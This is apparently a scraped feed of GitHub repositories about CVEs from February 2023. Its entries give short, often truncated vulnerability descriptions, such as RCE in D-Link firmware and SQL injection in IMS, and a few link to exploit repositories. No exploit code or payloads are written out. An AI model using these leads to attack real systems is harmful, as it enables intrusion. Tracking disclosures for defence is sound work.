**The mappress-google-maps-for-wordpress plugin before 2.54.6 for WordPress does not correctly implement capability checks for AJAX functions related to creation/retrieval/deletion of PHP template files, leading to Remote Code Execution. NOTE: this issue exists because of an incomplete fix for CVE-2020-12077. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12675](https://github.com/Live-Hack-CVE/CVE-2020-12675) create time: 2023-02-09T17:29:35Z

**FFmpeg version (git commit de8e6e67e7523e48bb27ac224a0b446df05e1640) suffers from a an assertion failure at src/libavutil/mathematics.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38291](https://github.com/Live-Hack-CVE/CVE-2021-38291) create time: 2023-02-09T17:29:32Z

**NASM v2.16 was discovered to contain a segmentation violation in the component ieee_write_file at /output/outieee.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46457](https://github.com/Live-Hack-CVE/CVE-2022-46457) create time: 2023-02-09T17:29:10Z

**D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46552](https://github.com/Live-Hack-CVE/CVE-2022-46552) create time: 2023-02-09T17:28:54Z

**IBM ICP4A - Automation Decision Services 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 244504. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23469](https://github.com/Live-Hack-CVE/CVE-2023-23469) create time: 2023-02-09T17:29:27Z

**Incorrect handling of '\0' bytes in file uploads in ModSecurity before 2.9.7 may allow for Web Application Firewall bypasses and buffer over-reads on the Web Application Firewall when executing rules that read the FILES_TMP_CONTENT collection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24021](https://github.com/Live-Hack-CVE/CVE-2023-24021) create time: 2023-02-09T17:29:04Z

**OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0624](https://github.com/Live-Hack-CVE/CVE-2023-0624) create time: 2023-02-09T17:29:00Z

**Cross-site scripting (XSS) vulnerability in EyouCMS v1.6.0 allows attackers to execute arbitrary code via the home page description on the basic information page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45755](https://github.com/Live-Hack-CVE/CVE-2022-45755) create time: 2023-02-09T15:15:20Z

**File upload vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows unauthorized attackers to directly upload malicious files to the courseimg directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45527](https://github.com/Live-Hack-CVE/CVE-2022-45527) create time: 2023-02-09T15:15:16Z

**IBM Sterling Secure Proxy 6.0.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 230523. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34362](https://github.com/Live-Hack-CVE/CVE-2022-34362) create time: 2023-02-09T15:15:13Z

**SQL Injection vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows attackers to execute arbitrary commands via the ad parameter to /admin_area/login_transfer.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45526](https://github.com/Live-Hack-CVE/CVE-2022-45526) create time: 2023-02-09T15:15:09Z

**IBM Cloud Pak for Multicloud Management Monitoring 2.0 and 2.3 allows users without admin roles access to admin functions by specifying direct URL paths. IBM X-Force ID: 238210. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42438](https://github.com/Live-Hack-CVE/CVE-2022-42438) create time: 2023-02-09T15:15:05Z

**IBM Sterling External Authentication Server 6.1.0 and IBM Sterling Secure Proxy 6.0.3 uses weaker than expected cryptographic algorithms during installation that could allow a local attacker to decrypt sensitive information. IBM X-Force ID: 231373. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35720](https://github.com/Live-Hack-CVE/CVE-2022-35720) create time: 2023-02-09T15:15:01Z

**Privilege escalation in the MSI repair functionality in Caphyon Advanced Installer 20.0 and below allows attackers to access and manipulate system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25396](https://github.com/Live-Hack-CVE/CVE-2023-25396) create time: 2023-02-09T15:15:36Z

**Wings is Pterodactyl's server control plane. Affected versions are subject to a vulnerability which can be used to create new files and directory structures on the host system that previously did not exist, potentially allowing attackers to change their resource allocations, promote their containers to privileged mode, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25152](https://github.com/Live-Hack-CVE/CVE-2023-25152) create time: 2023-02-09T15:15:32Z

**IBM Infosphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 245423. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23475](https://github.com/Live-Hack-CVE/CVE-2023-23475) create time: 2023-02-09T15:15:28Z

**HashiCorp Boundary from 0.10.0 through 0.11.2 contain an issue where when using a PKI-based worker with a Key Management Service (KMS) defined in the configuration file, new credentials created after an automatic rotation may not have been encrypted via the intended KMS. This would result in the credentials being store CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0690](https://github.com/Live-Hack-CVE/CVE-2023-0690) create time: 2023-02-09T15:15:25Z

**Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to V2.1.0-DEV. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0760](https://github.com/Live-Hack-CVE/CVE-2023-0760) create time: 2023-02-09T15:14:46Z

**Privilege Chaining in GitHub repository cockpit-hq/cockpit prior to 2.3.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0759](https://github.com/Live-Hack-CVE/CVE-2023-0759) create time: 2023-02-09T15:14:42Z

**A vulnerability was found in glorylion JFinalOA 1.0.2 and classified as critical. This issue affects some unknown processing of the file src/main/java/com/pointlion/mvc/common/model/SysOrg.java. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0758](https://github.com/Live-Hack-CVE/CVE-2023-0758) create time: 2023-02-09T14:09:29Z

**Uncontrolled Search Path Element in Checkmk Agent in Tribe29 Checkmk before 2.1.0p1, before 2.0.0p25 and before 1.6.0p29 on a Checkmk server allows the site user to escalate privileges via a manipulated unixcat executable CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43440](https://github.com/Live-Hack-CVE/CVE-2022-43440) create time: 2023-02-09T11:55:40Z

**no description** : [Bhathiya404/Exploiting-Stagefright-Vulnerability-CVE-2015-3864](https://github.com/Bhathiya404/Exploiting-Stagefright-Vulnerability-CVE-2015-3864) create time: 2023-02-09T11:08:10Z

**no description** : [ohnonoyesyes/CVE-2023-25194](https://github.com/ohnonoyesyes/CVE-2023-25194) create time: 2023-02-09T10:49:46Z

**An exploitable arbitrary write vulnerability exists in the Word document parser of the Atlantis Word Processor 3.0.2.3 and 3.0.2.5. A specially crafted document can prevent Atlas from adding elements to an array that is indexed by a loop. When reading from this array, the application will use an out-of-bounds index whi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3982](https://github.com/Live-Hack-CVE/CVE-2018-3982) create time: 2023-02-09T06:32:54Z

**A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE24(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25012](https://github.com/Live-Hack-CVE/CVE-2018-25012) create time: 2023-02-09T06:31:46Z

**A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in ShiftBytes(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25013](https://github.com/Live-Hack-CVE/CVE-2018-25013) create time: 2023-02-09T06:31:43Z

**A use of uninitialized value was found in libwebp in versions before 1.0.1 in ReadSymbol(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25014](https://github.com/Live-Hack-CVE/CVE-2018-25014) create time: 2023-02-09T06:31:39Z

**SDL (Simple DirectMedia Layer) 2.x through 2.0.9 has a heap-based buffer over-read in Fill_IMA_ADPCM_block, caused by an integer overflow in IMA_ADPCM_decode() in audio/SDL_wave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13626](https://github.com/Live-Hack-CVE/CVE-2019-13626) create time: 2023-02-09T06:32:44Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in BlitNtoN in video/SDL_blit_N.c when called from SDL_SoftBlit in video/SDL_blit.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13616](https://github.com/Live-Hack-CVE/CVE-2019-13616) create time: 2023-02-09T06:32:40Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a buffer over-read in IMA_ADPCM_nibble in audio/SDL_wave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7572](https://github.com/Live-Hack-CVE/CVE-2019-7572) create time: 2023-02-09T06:32:37Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (inside the wNumCoef loop). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7573](https://github.com/Live-Hack-CVE/CVE-2019-7573) create time: 2023-02-09T06:32:33Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a buffer over-read in SDL_LoadWAV_RW in audio/SDL_wave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7577](https://github.com/Live-Hack-CVE/CVE-2019-7577) create time: 2023-02-09T06:32:26Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in InitIMA_ADPCM in audio/SDL_wave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7578](https://github.com/Live-Hack-CVE/CVE-2019-7578) create time: 2023-02-09T06:32:22Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer overflow in MS_ADPCM_decode in audio/SDL_wave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7575](https://github.com/Live-Hack-CVE/CVE-2019-7575) create time: 2023-02-09T06:32:18Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in IMA_ADPCM_decode in audio/SDL_wave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7574](https://github.com/Live-Hack-CVE/CVE-2019-7574) create time: 2023-02-09T06:32:15Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (outside the wNumCoef loop). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7576](https://github.com/Live-Hack-CVE/CVE-2019-7576) create time: 2023-02-09T06:32:12Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in SDL_GetRGB in video/SDL_pixels.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7636](https://github.com/Live-Hack-CVE/CVE-2019-7636) create time: 2023-02-09T06:32:08Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in Map1toN in video/SDL_pixels.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7638](https://github.com/Live-Hack-CVE/CVE-2019-7638) create time: 2023-02-09T06:32:04Z

**SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in Blit1to4 in video/SDL_blit_1.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7635](https://github.com/Live-Hack-CVE/CVE-2019-7635) create time: 2023-02-09T06:32:01Z

**Product: AndroidVersions: Android kernelAndroid ID: A-127973231References: Upstream kernel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27068](https://github.com/Live-Hack-CVE/CVE-2020-27068) create time: 2023-02-09T06:32:47Z

**SDL (Simple DirectMedia Layer) through 2.0.12 has a heap-based buffer over-read in Blit_3or4_to_3or4__inversed_rgb in video/SDL_blit_N.c via a crafted .BMP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14410](https://github.com/Live-Hack-CVE/CVE-2020-14410) create time: 2023-02-09T06:31:57Z

**python-cryptography 3.2 is vulnerable to Bleichenbacher timing attacks in the RSA decryption API, via timed processing of valid PKCS#1 v1.5 ciphertext. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25659](https://github.com/Live-Hack-CVE/CVE-2020-25659) create time: 2023-02-09T06:31:36Z

**There is a heap overflow problem in video/SDL_pixels.c in SDL (Simple DirectMedia Layer) 2.x to 2.0.18 versions. By crafting a malicious .BMP file, an attacker can cause the application using this library to crash, denial of service or Code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33657](https://github.com/Live-Hack-CVE/CVE-2021-33657) create time: 2023-02-09T06:31:53Z

**A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22965](https://github.com/Live-Hack-CVE/CVE-2022-22965) create time: 2023-02-09T06:32:58Z

**Automox Agent for macOS before version 39 was vulnerable to a time-of-check/time-of-use (TOCTOU) race-condition attack during the agent install process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27904](https://github.com/Live-Hack-CVE/CVE-2022-27904) create time: 2023-02-09T06:32:51Z

**An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29622](https://github.com/Live-Hack-CVE/CVE-2022-29622) create time: 2023-02-09T06:32:29Z

**A potential memory leak issue was discovered in SDL2 in GLES_CreateTexture() function in SDL_render_gles.c. The vulnerability allows an attacker to cause a denial of service attack. The vulnerability affects SDL2 v2.0.4 and above. SDL-1.x are not affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4743](https://github.com/Live-Hack-CVE/CVE-2022-4743) create time: 2023-02-09T06:31:49Z

**new exploit YIPEEEE** : [Exploitables/CVE-2009-0824](https://github.com/Exploitables/CVE-2009-0824) create time: 2023-02-09T06:16:56Z

**KeePass 2.53.1 with removed ECAS Trigger System Remediating CVE-2023-24055** : [digital-dev/KeePass-TriggerLess](https://github.com/digital-dev/KeePass-TriggerLess) create time: 2023-02-09T03:22:25Z

**Identified vulnerability called CVE-2016-5195 on Linux systems and Exploited successfully as well as gained root access of that system. Technologies: C ,C++** : [ireshchaminda1/System-Exploitation-May-2021-](https://github.com/ireshchaminda1/System-Exploitation-May-2021-) create time: 2023-02-09T02:19:22Z

**The weblibrarian plugin before 3.4.8.6 for WordPress has XSS via front-end short codes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18539](https://github.com/Live-Hack-CVE/CVE-2017-18539) create time: 2023-02-09T01:58:54Z

**Wordpress Multiple themes - Unauthenticated Arbitrary File Upload** : [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit) create time: 2023-02-08T17:37:09Z

**Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0669](https://github.com/Live-Hack-CVE/CVE-2023-0669) create time: 2023-02-09T01:58:50Z

**Delta Electronics DIAScreen versions 1.2.1.23 and prior are vulnerable to a buffer overflow through improper restrictions of operations within memory, which could allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0251](https://github.com/Live-Hack-CVE/CVE-2023-0251) create time: 2023-02-09T01:58:47Z

**Delta Electronics DIAScreen versions 1.2.1.23 and prior are vulnerable to a stack-based buffer overflow, which could allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0250](https://github.com/Live-Hack-CVE/CVE-2023-0250) create time: 2023-02-09T01:58:43Z

**Delta Electronics DIAScreen versions 1.2.1.23 and prior are vulnerable to out-of-bounds write, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0249](https://github.com/Live-Hack-CVE/CVE-2023-0249) create time: 2023-02-09T01:58:40Z

**Wings is Pterodactyl's server control plane. This vulnerability can be used to delete files and directories recursively on the host system. This vulnerability can be combined with `GHSA-p8r3-83r8-jwj5` to overwrite files on the host system. In order to use this exploit, an attacker must have an existing "server" alloca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25168](https://github.com/Live-Hack-CVE/CVE-2023-25168) create time: 2023-02-09T01:58:29Z

**The weblibrarian plugin before 3.4.8.7 for WordPress has XSS via front-end short codes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18540](https://github.com/Live-Hack-CVE/CVE-2017-18540) create time: 2023-02-08T23:46:54Z

**The weblibrarian plugin before 3.4.8.5 for WordPress has XSS via front-end short codes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18538](https://github.com/Live-Hack-CVE/CVE-2017-18538) create time: 2023-02-08T23:46:50Z

**The wp-slimstat plugin before 4.8.1 for WordPress has XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15112](https://github.com/Live-Hack-CVE/CVE-2019-15112) create time: 2023-02-08T23:46:57Z

**Cross-Site Request Forgery (CSRF) vulnerability in WP Sunshine Sunshine Photo Cart plugin <= 2.9.13 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40692](https://github.com/Live-Hack-CVE/CVE-2022-40692) create time: 2023-02-08T23:47:40Z

**Cross-Site Request Forgery (CSRF) vulnerability in Magneticlab Sàrl Homepage Pop-up plugin <= 1.2.5 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44585](https://github.com/Live-Hack-CVE/CVE-2022-44585) create time: 2023-02-08T23:47:35Z

**Bosch Security Systems B420 firmware 02.02.0001 employs IP based authorization in its authentication mechanism, allowing attackers to access the device as long as they are on the same network as a legitimate user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47648](https://github.com/Live-Hack-CVE/CVE-2022-47648) create time: 2023-02-08T23:47:27Z

**thinkphp 6.0.0~6.0.13 and 6.1.0~6.1.1 contains a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45982](https://github.com/Live-Hack-CVE/CVE-2022-45982) create time: 2023-02-08T23:47:24Z

**A flaw (CVE-2022-38900) was discovered in one of Kibana’s third party dependencies, that could allow an authenticated user to perform a request that crashes the Kibana server process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38778](https://github.com/Live-Hack-CVE/CVE-2022-38778) create time: 2023-02-08T23:47:20Z

**An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38777](https://github.com/Live-Hack-CVE/CVE-2022-38777) create time: 2023-02-08T23:47:16Z

**AMI Megarac Password reset interception via API CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26872](https://github.com/Live-Hack-CVE/CVE-2022-26872) create time: 2023-02-08T23:47:08Z

**Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25163](https://github.com/Live-Hack-CVE/CVE-2023-25163) create time: 2023-02-08T23:47:30Z

**Baicells Nova 227, Nova 233, and Nova 243 LTE TDD eNodeB devices with firmware through RTS/RTD 3.6.6 are vulnerable to remote shell code exploitation via HTTP command injections. Commands are executed using pre-login execution and executed with root permissions. The following methods below have been tested and validate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24508](https://github.com/Live-Hack-CVE/CVE-2023-24508) create time: 2023-02-08T23:47:12Z

**A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4304](https://github.com/Live-Hack-CVE/CVE-2022-4304) create time: 2023-02-08T21:33:35Z

**IBM API Connect 10.0.0.0 through 10.0.5.0, 10.0.1.0 through 10.0.1.7, and 2018.4.1.0 through 2018.4.1.20 is vulnerable to External Service Interaction attack, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to induce the application to perform server-side DNS loo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34350](https://github.com/Live-Hack-CVE/CVE-2022-34350) create time: 2023-02-08T21:33:31Z

**Cross-Site Request Forgery (CSRF) vulnerability in JS Help Desk plugin <= 2.7.1 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46842](https://github.com/Live-Hack-CVE/CVE-2022-46842) create time: 2023-02-08T21:32:54Z

**Cross-Site Request Forgery (CSRF) vulnerability in Lauri Karisola / WP Trio Conditional Shipping for WooCommerce plugin <= 2.3.1 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46815](https://github.com/Live-Hack-CVE/CVE-2022-46815) create time: 2023-02-08T21:32:51Z

**Cross-Site Request Forgery (CSRF) in WPVibes WP Mail Log plugin <= 1.0.1 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45807](https://github.com/Live-Hack-CVE/CVE-2022-45807) create time: 2023-02-08T21:32:47Z

**Selfwealth iOS mobile App 3.3.1 is vulnerable to Insecure App Transport Security (ATS) Settings. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23131](https://github.com/Live-Hack-CVE/CVE-2023-23131) create time: 2023-02-08T21:33:26Z

**A vulnerability was found in TRENDNet TEW-811DRU 1.0.10.0. It has been classified as critical. This affects an unknown part of the file /wireless/guestnetwork.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the publ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0617](https://github.com/Live-Hack-CVE/CVE-2023-0617) create time: 2023-02-08T21:33:20Z

**A vulnerability was found in TRENDnet TEW-652BRP 3.04B01. It has been declared as critical. This vulnerability affects unknown code of the file cfg_op.ccp of the component Web Service. The manipulation leads to memory corruption. The attack can be initiated remotely. The exploit has been disclosed to the public and may CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0618](https://github.com/Live-Hack-CVE/CVE-2023-0618) create time: 2023-02-08T21:33:16Z

**lmxcms v1.41 was discovered to contain an arbitrary file deletion vulnerability via BackdbAction.class.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23136](https://github.com/Live-Hack-CVE/CVE-2023-23136) create time: 2023-02-08T21:33:09Z

**Dell PowerScale OneFS 9.0.0.x - 9.4.0.x contain an insertion of sensitive information into log file vulnerability in celog. A low privileges user could potentially exploit this vulnerability, leading to information disclosure and escalation of privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22575](https://github.com/Live-Hack-CVE/CVE-2023-22575) create time: 2023-02-08T21:33:04Z

**Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the N CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25296](https://github.com/Live-Hack-CVE/CVE-2021-25296) create time: 2023-02-08T19:21:38Z

**Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25297](https://github.com/Live-Hack-CVE/CVE-2021-25297) create time: 2023-02-08T19:21:34Z

**Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25298](https://github.com/Live-Hack-CVE/CVE-2021-25298) create time: 2023-02-08T19:21:30Z

**lmxcms v1.41 was discovered to contain an arbitrary file read vulnerability via TemplateAction.class.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48094](https://github.com/Live-Hack-CVE/CVE-2022-48094) create time: 2023-02-08T19:21:06Z

**Seacms v12.7 was discovered to contain a remote code execution (RCE) vulnerability via the ip parameter at admin_ ip.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48093](https://github.com/Live-Hack-CVE/CVE-2022-48093) create time: 2023-02-08T19:20:59Z

**Improper input validation in driver adgnetworkwfpdrv.sys in Adguard For Windows x86 up to version 7.11 allows attacker to gain local privileges escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45770](https://github.com/Live-Hack-CVE/CVE-2022-45770) create time: 2023-02-08T19:20:42Z

**Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via PO in the purchase component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23073](https://github.com/Live-Hack-CVE/CVE-2023-23073) create time: 2023-02-08T19:21:41Z

**A file disclosure vulnerability in the Palo Alto Networks Cortex XSOAR server software enables an authenticated user with access to the web interface to read local files from the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0003](https://github.com/Live-Hack-CVE/CVE-2023-0003) create time: 2023-02-08T19:21:26Z

**A problem with a protection mechanism in the Palo Alto Networks Cortex XDR agent on Windows devices allows a local user to execute privileged cytool commands that disable or uninstall the agent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0002](https://github.com/Live-Hack-CVE/CVE-2023-0002) create time: 2023-02-08T19:21:22Z

**An information exposure vulnerability in the Palo Alto Networks Cortex XDR agent on Windows devices allows a local system administrator to disclose the admin password for the agent in cleartext, which bad actors can then use to execute privileged cytool commands that disable or uninstall the agent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0001](https://github.com/Live-Hack-CVE/CVE-2023-0001) create time: 2023-02-08T19:21:18Z

**Dell EMC prior to version DDOS 7.9 contain(s) an OS command injection Vulnerability. An authenticated non admin attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23692](https://github.com/Live-Hack-CVE/CVE-2023-23692) create time: 2023-02-08T19:21:12Z

**Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7223 https://github.com/apache/inlong/pull/7223 to s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24997](https://github.com/Live-Hack-CVE/CVE-2023-24997) create time: 2023-02-08T19:21:03Z

**NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow attackers to steal Protected Health Information because the product is for health charting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24610](https://github.com/Live-Hack-CVE/CVE-2023-24610) create time: 2023-02-08T19:20:55Z

**Selfwealth iOS mobile App 3.3.1 is vulnerable to Sensitive key disclosure. The application reveals hardcoded API keys. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23132](https://github.com/Live-Hack-CVE/CVE-2023-23132) create time: 2023-02-08T19:20:49Z

**Open Redirect in GitHub repository btcpayserver/btcpayserver prior to 1.7.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0748](https://github.com/Live-Hack-CVE/CVE-2023-0748) create time: 2023-02-08T18:15:50Z

**Dell PowerScale OneFS 9.1.0.x-9.4.0.x contain an insertion of sensitive information into log file vulnerability in change password api. A low privilege local attacker could potentially exploit this vulnerability, leading to system takeover. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22572](https://github.com/Live-Hack-CVE/CVE-2023-22572) create time: 2023-02-08T18:15:39Z

